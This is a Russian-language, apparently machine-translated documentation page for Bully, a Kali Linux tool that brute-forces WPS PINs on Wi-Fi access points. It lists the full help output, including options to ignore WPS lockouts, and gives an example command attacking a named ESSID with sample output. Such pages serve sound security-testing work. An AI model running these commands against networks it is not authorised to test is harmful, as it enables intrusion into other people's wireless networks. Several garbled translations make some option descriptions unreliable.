//kalinux.info
Wireless Attacks 295 просмотров

Bully

Описание Bully Package

Bully - это новая реализация атаки грубой силы WPS, написанная на C. Она концептуально идентична другим программам, поскольку она использует (теперь хорошо известный) недостаток дизайна в спецификации WPS. Он имеет несколько преимуществ перед исходным кодом reaver. Они включают в себя меньшее количество зависимостей, улучшенную память и производительность процессора, правильную обработку endianness и более надежный набор опций. Он работает на Linux и специально разработан для работы на встроенных Linux-системах (OpenWrt и т. Д.) Независимо от архитектуры.

Bully предлагает несколько улучшений в обнаружении и обработке аномальных сценариев. Он был протестирован против точек доступа от многочисленных поставщиков и с различными конфигурациями, с большим успехом.

Инструменты, включенные в пакет хулиганов

bully - Выполнение атаки грубой силы WPS, написанной на C


root@kali:~# bully -h

  usage: bully  interface

  Обязательные аргументы:

      interface      : беспроводной интерфейс в режиме монитора (требуется корень)

      -b, --bssid macaddr    : MAC-адрес целевой точки доступа 
   Or
      -e, --essid string     : расширенный SSID для точки доступа

  Дополнительные аргументы:

      -c, --channel N[,N...] : Номер канала AP или список для перехода              [b / g]
      -i, --index N          : Начальный индекс штыря (7 или 8 цифр)                 [Auto]
      -l, --lockwait N       : Секунды ожидания, если AP блокирует WPS                 [43]
      -o, --outfile file     : Выходной файл для сообщений                         [stdout]
      -p, --pin N            : Начальный контактный номер (7 или 8 цифр)             [Auto]
      -s, --source macaddr   : Исходный (аппаратный) MAC-адрес                      [Probe]
      -v, --verbosity N      : Уровень verbosity 1-3, 1 самый тихий                     [3]
      -w, --workdir path     : Расположение файлов pin ​​/ session                [~/.bully/]
      -5, --5ghz             : Переключение на 5GHz a / n список каналов по умолчанию  [No]
      -B, --bruteforce       : Bruteforce цифра контрольной суммы PIN-кода WPS         [No]
      -F, --force            : Сила продолжается, несмотря на предупреждения           [No]
      -S, --sequential       : Последовательные контакты (не рандомизируйте)           [No]
      -T, --test             : Режим тестирования (не вставляйте пакеты)               [No]

  Дополнительные аргументы:

      -a, --acktime N        : Устаревшие / проигнорировано                          [Auto]
      -r, --retries N        : Повторно отправлять пакеты N раз, когда не было          [2]
      -m, --m13time N        : Устаревшие / проигнорировано                          [Auto]
      -t, --timeout N        : Устаревшие / проигнорировано                          [Auto]
      -1, --pin1delay M,N    : Задержка M секунд каждый N-й M5                        [0,1]
      -2, --pin2delay M,N    : Задержка M секунд каждый N-й M7                        [5,1]
      -A, --noacks           : Отключить проверку ACK для отправленных пакетов         [No]
      -C, --nocheck          : Пропустить проверку CRC / FCS (производительность)      [No]
      -D, --detectlock       : Обнаружение блокировок WPS, не зарегистрированных AP    [No]
      -E, --eapfail          : EAP Failure прекращает работу с каждым обменом          [No]
      -L, --lockignore       : Игнорировать блокировки WPS, о которых сообщает AP      [No]
      -M, --m57nack          : Таймауты M5 / M7, обработанные как WSC_NACK             [No]
      -N, --nofcs            : Пакеты не содержат поля FCS                           [Auto]
      -P, --probe            : Использовать запрос зонда для небедренного AP           [No]
      -R, --radiotap         : Предположим, что имеются заголовки радиатора          [Auto]
      -W, --windows7         : Маскарад как регистратор Windows 7                      [No]
      -Z, --suppress         : Подавить алгоритм дросселирования пакетов               [No]
      -V, --version          : Версия для печати и выход
      -h, --help             : Отобразить эту справочную информацию

Пример использования bully

Атакуйте беспроводной ESSID (-e 6F36E6) через интерфейс режима монитора (mon0):

root @ kali: ~ # bully -e 6F36E6 mon0 
[!] Bully v1.0-22 - Утилита оценки уязвимости WPS 
[X] Неизвестная частота '-113135872', сообщенная интерфейсом 'mon0' 
[!] Использование '00: 1f: 33 : f3: 51: 13 'для исходного MAC-адреса 
[+] Тип набора данных установлен на' 127 ', присутствуют заголовки радиатов 
[+] Сканирование для маяка от «6F36E6» на канале «неизвестно» 
[+] Получен маяк для «6F36E6» (9c: d3: 6d: b8: ff: 56) 
[+] Интерфейс переключения «mon0» на канал «8» 
[!] Информационный элемент маяка указывает, что WPS заблокирован 
[!] Создание нового рандомизированного файла-пика '/root/.bully / pins ' 
[+] Индекс начального номера 
буфера равен' 0000000 ' [+] Последнее состояние =' NoAssoc 'Следующий вывод'54744431'